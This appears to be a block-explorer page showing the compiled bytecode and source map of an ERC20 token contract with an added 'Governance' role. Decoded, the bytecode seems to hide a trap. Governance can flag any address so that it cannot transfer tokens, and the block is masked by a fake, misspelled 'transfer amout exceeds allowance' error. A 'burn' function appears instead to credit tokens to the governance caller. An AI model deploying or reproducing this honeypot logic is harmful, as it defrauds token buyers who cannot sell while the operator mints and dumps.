b1565b82525050565b6117ed81611abb565b82525050565b600060208201905061180860008301846115da565b92915050565b600060208201905061182360008301846115e9565b92915050565b6000602082019050818103600083015261184381846115f8565b905092915050565b6000602082019050818103600083015261186481611631565b9050919050565b6000602082019050818103600083015261188481611654565b9050919050565b600060208201905081810360008301526118a481611677565b9050919050565b600060208201905081810360008301526118c48161169a565b9050919050565b600060208201905081810360008301526118e4816116bd565b9050919050565b60006020820190508181036000830152611904816116e0565b9050919050565b6000602082019050818103600083015261192481611703565b9050919050565b6000602082019050818103600083015261194481611726565b9050919050565b6000602082019050818103600083015261196481611749565b9050919050565b600060208201905081810360008301526119848161176c565b9050919050565b600060208201905081810360008301526119a48161178f565b9050919050565b600060208201905081810360008301526119c4816117b2565b9050919050565b60006020820190506119e060008301846117d5565b92915050565b60006020820190506119fb60008301846117e4565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a2882611ab1565b9150611a3383611ab1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6857611a67611b2d565b5b828201905092915050565b6000611a7e82611a91565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611ae6578082015181840152602081019050611acb565b83811115611af5576000848401525b50505050565b60006002820490506001821680611b1357607f821691505b60208210811415611b2757611b26611b5c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f476f7665726e616e63653a2063616c6c6572206973206e6f742074686520676f60008201527f7665726e616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f7574206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611f3881611a73565b8114611f4357600080fd5b50565b611f4f81611ab1565b8114611f5a57600080fd5b5056fea2646970667358221220c71b570fb59a39397102dfe243565d5c1b855ad08003d85dfa06536a4a9e2fdb64736f6c63430008050033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c80634355b9d2116100a257806395d89b411161007157806395d89b41146102ba578063a457c2d7146102d8578063a9059cbb14610308578063dd62ed3e14610338578063dfa35082146103685761010b565b80634355b9d21461024657806370a0823114610262578063715018a6146102925780638da5cb5b1461029c5761010b565b80632b603c71116100de5780632b603c71146101ac578063313ce567146101dc57806339509351146101fa57806342966c681461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611829565b60405180910390f35b6101486004803603810190610143919061156d565b610416565b604051610155919061180e565b60405180910390f35b610166610434565b60405161017391906119cb565b60405180910390f35b6101966004803603810190610191919061151a565b61043e565b6040516101a3919061180e565b60405180910390f35b6101c660048036038101906101c191906114ad565b610536565b6040516101d3919061180e565b60405180910390f35b6101e461058c565b6040516101f191906119e6565b60405180910390f35b610214600480360381019061020f919061156d565b610595565b604051610221919061180e565b60405180910390f35b610244600480360381019061023f91906115ad565b610641565b005b610260600480360381019061025b91906114ad565b6106ec565b005b61027c600480360381019061027791906114ad565b610895565b60405161028991906119cb565b60405180910390f35b61029a6108de565b005b6102a4610966565b6040516102b191906117f3565b60405180910390f35b6102c261098f565b6040516102cf9190611829565b60405180910390f35b6102f260048036038101906102ed919061156d565b610a21565b6040516102ff919061180e565b60405180910390f35b610322600480360381019061031d919061156d565b610b0c565b60405161032f919061180e565b60405180910390f35b610352600480360381019061034d91906114da565b610b2a565b60405161035f91906119cb565b60405180910390f35b610382600480360381019061037d91906114ad565b610bb1565b005b60606006805461039390611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611afb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610ccc565b8484610cd4565b6001905092915050565b6000600554905090565b600061044b848484610e9f565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906118eb565b60405180910390fd5b61052a85610522610ccc565b858403610cd4565b60019150509392505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006009905090565b60006106376105a2610ccc565b8484600460006105b0610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106329190611a1d565b610cd4565b6001905092915050565b610649610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146106d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106cf906118ab565b60405180910390fd5b6106e96106e3610ccc565b8261120d565b50565b6106f4610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610783576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077a906118ab565b60405180910390fd5b60011515600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610839576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610892565b6001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108e6610ccc565b73ffffffffffffffffffffffffffffffffffffffff16610904610966565b73ffffffffffffffffffffffffffffffffffffffff161461095a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109519061190b565b60405180910390fd5b61096460006113b5565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461099e90611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546109ca90611afb565b8015610a175780601f106109ec57610100808354040283529160200191610a17565b820191906000526020600020905b8154815290600101906020018083116109fa57829003601f168201915b5050505050905090565b60008060046000610a30610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae4906119ab565b60405180910390fd5b610b01610af8610ccc565b85858403610cd4565b600191505092915050565b6000610b20610b19610ccc565b8484610e9f565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610bb9610ccc565b73ffffffffffffffffffffffffffffffffffffffff16610bd7610966565b73ffffffffffffffffffffffffffffffffffffffff1614610c2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c249061190b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c8857600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3b9061196b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab9061188b565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e9291906119cb565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f069061194b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f769061184b565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806110205750600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110695760008114611068576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105f9061198b565b60405180910390fd5b5b611074838383611479565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f2906118cb565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111909190611a1d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111f491906119cb565b60405180910390a361120784848461147e565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561127d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112749061192b565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611304576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112fb9061186b565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113a891906119cb565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b60008135905061149281611f2f565b92915050565b6000813590506114a781611f46565b92915050565b6000602082840312156114c3576114c2611b8b565b5b60006114d184828501611483565b91505092915050565b600080604083850312156114f1576114f0611b8b565b5b60006114ff85828601611483565b925050602061151085828601611483565b9150509250929050565b60008060006060848603121561153357611532611b8b565b5b600061154186828701611483565b935050602061155286828701611483565b925050604061156386828701611498565b9150509250925092565b6000806040838503121561158457611583611b8b565b5b600061159285828601611483565b92505060206115a385828601611498565b9150509250929050565b6000602082840312156115c3576115c2611b8b565b5b60006115d184828501611498565b91505092915050565b6115e381611a73565b82525050565b6115f281611a85565b82525050565b600061160382611a01565b61160d8185611a0c565b935061161d818560208601611ac8565b61162681611b90565b840191505092915050565b600061163e602383611a0c565b915061164982611ba1565b604082019050919050565b6000611661602283611a0c565b915061166c82611bf0565b604082019050919050565b6000611684602283611a0c565b915061168f82611c3f565b604082019050919050565b60006116a7602883611a0c565b91506116b282611c8e565b604082019050919050565b60006116ca602683611a0c565b91506116d582611cdd565b604082019050919050565b60006116ed602883611a0c565b91506116f882611d2c565b604082019050919050565b6000611710602083611a0c565b915061171b82611d7b565b602082019050919050565b6000611733602183611a0c565b915061173e82611da4565b604082019050919050565b6000611756602583611a0c565b915061176182611df3565b604082019050919050565b6000611779602483611a0c565b915061178482611e42565b604082019050919050565b600061179c602783611a0c565b91506117a782611e91565b604082019050919050565b60006117bf602583611a0c565b91506117ca82611ee0565b604082019050919050565b6117de81611ab1565b82525050565b6117ed81611abb565b82525050565b600060208201905061180860008301846115da565b92915050565b600060208201905061182360008301846115e9565b92915050565b6000602082019050818103600083015261184381846115f8565b905092915050565b6000602082019050818103600083015261186481611631565b9050919050565b6000602082019050818103600083015261188481611654565b9050919050565b600060208201905081810360008301526118a481611677565b9050919050565b600060208201905081810360008301526118c48161169a565b9050919050565b600060208201905081810360008301526118e4816116bd565b9050919050565b60006020820190508181036000830152611904816116e0565b9050919050565b6000602082019050818103600083015261192481611703565b9050919050565b6000602082019050818103600083015261194481611726565b9050919050565b6000602082019050818103600083015261196481611749565b9050919050565b600060208201905081810360008301526119848161176c565b9050919050565b600060208201905081810360008301526119a48161178f565b9050919050565b600060208201905081810360008301526119c4816117b2565b9050919050565b60006020820190506119e060008301846117d5565b92915050565b60006020820190506119fb60008301846117e4565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a2882611ab1565b9150611a3383611ab1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6857611a67611b2d565b5b828201905092915050565b6000611a7e82611a91565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611ae6578082015181840152602081019050611acb565b83811115611af5576000848401525b50505050565b60006002820490506001821680611b1357607f821691505b60208210811415611b2757611b26611b5c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f476f7665726e616e63653a2063616c6c6572206973206e6f742074686520676f60008201527f7665726e616e6365000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f7574206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611f3881611a73565b8114611f4357600080fd5b50565b611f4f81611ab1565b8114611f5a57600080fd5b5056fea2646970667358221220c71b570fb59a39397102dfe243565d5c1b855ad08003d85dfa06536a4a9e2fdb64736f6c63430008050033

Deployed Bytecode Sourcemap

17696:338:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7878:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10677:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8997:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11328:492;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9597:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8840:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12229:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10210:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9312:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9168:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5631:103;;;:::i;:::-;;4531:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8097:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12947:413;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9919:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10379:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5136:144;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7878:100;7932:13;7965:5;7958:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7878:100;:::o;10677:169::-;10760:4;10777:39;10786:12;:10;:12::i;:::-;10800:7;10809:6;10777:8;:39::i;:::-;10834:4;10827:11;;10677:169;;;;:::o;8997:108::-;9058:7;9085:12;;9078:19;;8997:108;:::o;11328:492::-;11468:4;11485:36;11495:6;11503:9;11514:6;11485:9;:36::i;:::-;11534:24;11561:11;:19;11573:6;11561:19;;;;;;;;;;;;;;;:33;11581:12;:10;:12::i;:::-;11561:33;;;;;;;;;;;;;;;;11534:60;;11633:6;11613:16;:26;;11605:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;11720:57;11729:6;11737:12;:10;:12::i;:::-;11770:6;11751:16;:25;11720:8;:57::i;:::-;11808:4;11801:11;;;11328:492;;;;;:::o;9597:109::-;9655:4;9679:10;:19;9690:7;9679:19;;;;;;;;;;;;;;;;;;;;;;;;;9672:26;;9597:109;;;:::o;8840:92::-;8898:5;8923:1;8916:8;;8840:92;:::o;12229:215::-;12317:4;12334:80;12343:12;:10;:12::i;:::-;12357:7;12403:10;12366:11;:25;12378:12;:10;:12::i;:::-;12366:25;;;;;;;;;;;;;;;:34;12392:7;12366:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;12334:8;:80::i;:::-;12432:4;12425:11;;12229:215;;;;:::o;10210:106::-;4994:12;:10;:12::i;:::-;4979:27;;:11;;;;;;;;;;;:27;;;4971:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;10281:27:::1;10287:12;:10;:12::i;:::-;10301:6;10281:5;:27::i;:::-;10210:106:::0;:::o;9312:184::-;4994:12;:10;:12::i;:::-;4979:27;;:11;;;;;;;;;;;:27;;;4971:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;9417:4:::1;9394:27;;:10;:19;9405:7;9394:19;;;;;;;;;;;;;;;;;;;;;;;;;:27;;;9390:99;;;9446:5;9424:10;:19;9435:7;9424:19;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;9390:99;;;9482:4;9460:10;:19;9471:7;9460:19;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;9390:99;9312:184:::0;:::o;9168:127::-;9242:7;9269:9;:18;9279:7;9269:18;;;;;;;;;;;;;;;;9262:25;;9168:127;;;:::o;5631:103::-;4762:12;:10;:12::i;:::-;4751:23;;:7;:5;:7::i;:::-;:23;;;4743:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5696:30:::1;5723:1;5696:18;:30::i;:::-;5631:103::o:0;4531:87::-;4577:7;4604:6;;;;;;;;;;;4597:13;;4531:87;:::o;8097:104::-;8153:13;8186:7;8179:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8097:104;:::o;12947:413::-;13040:4;13057:24;13084:11;:25;13096:12;:10;:12::i;:::-;13084:25;;;;;;;;;;;;;;;:34;13110:7;13084:34;;;;;;;;;;;;;;;;13057:61;;13157:15;13137:16;:35;;13129:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;13250:67;13259:12;:10;:12::i;:::-;13273:7;13301:15;13282:16;:34;13250:8;:67::i;:::-;13348:4;13341:11;;;12947:413;;;;:::o;9919:175::-;10005:4;10022:42;10032:12;:10;:12::i;:::-;10046:9;10057:6;10022:9;:42::i;:::-;10082:4;10075:11;;9919:175;;;;:::o;10379:151::-;10468:7;10495:11;:18;10507:5;10495:18;;;;;;;;;;;;;;;:27;10514:7;10495:27;;;;;;;;;;;;;;;;10488:34;;10379:151;;;;:::o;5136:144::-;4762:12;:10;:12::i;:::-;4751:23;;:7;:5;:7::i;:::-;:23;;;4743:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5237:1:::1;5214:25;;:11;;;;;;;;;;;:25;;;5205:35;;;::::0;::::1;;5265:7;5251:11;;:21;;;;;;;;;;;;;;;;;;5136:144:::0;:::o;823:98::-;876:7;903:10;896:17;;823:98;:::o;15939:380::-;16092:1;16075:19;;:5;:19;;;;16067:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16173:1;16154:21;;:7;:21;;;;16146:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16257:6;16227:11;:18;16239:5;16227:18;;;;;;;;;;;;;;;:27;16246:7;16227:27;;;;;;;;;;;;;;;:36;;;;16295:7;16279:32;;16288:5;16279:32;;;16304:6;16279:32;;;;;;:::i;:::-;;;;;;;;15939:380;;;:::o;13850:875::-;14008:1;13990:20;;:6;:20;;;;13982:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;14092:1;14071:23;;:9;:23;;;;14063:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14149:10;:18;14160:6;14149:18;;;;;;;;;;;;;;;;;;;;;;;;;:43;;;;14171:10;:21;14182:9;14171:21;;;;;;;;;;;;;;;;;;;;;;;;;14149:43;14145:123;;;14223:1;14213:6;:11;14204:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;14145:123;14289:47;14310:6;14318:9;14329:6;14289:20;:47::i;:::-;14349:21;14373:9;:17;14383:6;14373:17;;;;;;;;;;;;;;;;14349:41;;14426:6;14409:13;:23;;14401:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;14547:6;14531:13;:22;14511:9;:17;14521:6;14511:17;;;;;;;;;;;;;;;:42;;;;14599:6;14575:9;:20;14585:9;14575:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;14640:9;14623:35;;14632:6;14623:35;;;14651:6;14623:35;;;;;;:::i;:::-;;;;;;;;14671:46;14691:6;14699:9;14710:6;14671:19;:46::i;:::-;13971:754;13850:875;;;:::o;15058:443::-;15161:1;15142:21;;:7;:21;;;;15134:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15214:22;15239:9;:18;15249:7;15239:18;;;;;;;;;;;;;;;;15214:43;;15294:6;15276:14;:24;;15268:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;15413:6;15396:14;:23;15375:9;:18;15385:7;15375:18;;;;;;;;;;;;;;;:44;;;;15482:1;15456:37;;15465:7;15456:37;;;15486:6;15456:37;;;;;;:::i;:::-;;;;;;;;15123:378;15058:443;;:::o;5894:191::-;5968:16;5987:6;;;;;;;;;;;5968:25;;6013:8;6004:6;;:17;;;;;;;;;;;;;;;;;;6068:8;6037:40;;6058:8;6037:40;;;;;;;;;;;;5957:128;5894:191;:::o;16877:125::-;;;;:::o;17565:124::-;;;;:::o;7:139:1:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;198:5;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:329::-;356:6;405:2;393:9;384:7;380:23;376:32;373:2;;;411:79;;:::i;:::-;373:2;531:1;556:53;601:7;592:6;581:9;577:22;556:53;:::i;:::-;546:63;;502:117;363:263;;;;:::o;632:474::-;700:6;708;757:2;745:9;736:7;732:23;728:32;725:2;;;763:79;;:::i;:::-;725:2;883:1;908:53;953:7;944:6;933:9;929:22;908:53;:::i;:::-;898:63;;854:117;1010:2;1036:53;1081:7;1072:6;1061:9;1057:22;1036:53;:::i;:::-;1026:63;;981:118;715:391;;;;;:::o;1112:619::-;1189:6;1197;1205;1254:2;1242:9;1233:7;1229:23;1225:32;1222:2;;;1260:79;;:::i;:::-;1222:2;1380:1;1405:53;1450:7;1441:6;1430:9;1426:22;1405:53;:::i;:::-;1395:63;;1351:117;1507:2;1533:53;1578:7;1569:6;1558:9;1554:22;1533:53;:::i;:::-;1523:63;;1478:118;1635:2;1661:53;1706:7;1697:6;1686:9;1682:22;1661:53;:::i;:::-;1651:63;;1606:118;1212:519;;;;;:::o;1737:474::-;1805:6;1813;1862:2;1850:9;1841:7;1837:23;1833:32;1830:2;;;1868:79;;:::i;:::-;1830:2;1988:1;2013:53;2058:7;2049:6;2038:9;2034:22;2013:53;:::i;:::-;2003:63;;1959:117;2115:2;2141:53;2186:7;2177:6;2166:9;2162:22;2141:53;:::i;:::-;2131:63;;2086:118;1820:391;;;;;:::o;2217:329::-;2276:6;2325:2;2313:9;2304:7;2300:23;2296:32;2293:2;;;2331:79;;:::i;:::-;2293:2;2451:1;2476:53;2521:7;2512:6;2501:9;2497:22;2476:53;:::i;:::-;2466:63;;2422:117;2283:263;;;;:::o;2552:118::-;2639:24;2657:5;2639:24;:::i;:::-;2634:3;2627:37;2617:53;;:::o;2676:109::-;2757:21;2772:5;2757:21;:::i;:::-;2752:3;2745:34;2735:50;;:::o;2791:364::-;2879:3;2907:39;2940:5;2907:39;:::i;:::-;2962:71;3026:6;3021:3;2962:71;:::i;:::-;2955:78;;3042:52;3087:6;3082:3;3075:4;3068:5;3064:16;3042:52;:::i;:::-;3119:29;3141:6;3119:29;:::i;:::-;3114:3;3110:39;3103:46;;2883:272;;;;;:::o;3161:366::-;3303:3;3324:67;3388:2;3383:3;3324:67;:::i;:::-;3317:74;;3400:93;3489:3;3400:93;:::i;:::-;3518:2;3513:3;3509:12;3502:19;;3307:220;;;:::o;3533:366::-;3675:3;3696:67;3760:2;3755:3;3696:67;:::i;:::-;3689:74;;3772:93;3861:3;3772:93;:::i;:::-;3890:2;3885:3;3881:12;3874:19;;3679:220;;;:::o;3905:366::-;4047:3;4068:67;4132:2;4127:3;4068:67;:::i;:::-;4061:74;;4144:93;4233:3;4144:93;:::i;:::-;4262:2;4257:3;4253:12;4246:19;;4051:220;;;:::o;4277:366::-;4419:3;4440:67;4504:2;4499:3;4440:67;:::i;:::-;4433:74;;4516:93;4605:3;4516:93;:::i;:::-;4634:2;4629:3;4625:12;4618:19;;4423:220;;;:::o;4649:366::-;4791:3;4812:67;4876:2;4871:3;4812:67;:::i;:::-;4805:74;;4888:93;4977:3;4888:93;:::i;:::-;5006:2;5001:3;4997:12;4990:19;;4795:220;;;:::o;5021:366::-;5163:3;5184:67;5248:2;5243:3;5184:67;:::i;:::-;5177:74;;5260:93;5349:3;5260:93;:::i;:::-;5378:2;5373:3;5369:12;5362:19;;5167:220;;;:::o;5393:366::-;5535:3;5556:67;5620:2;5615:3;5556:67;:::i;:::-;5549:74;;5632:93;572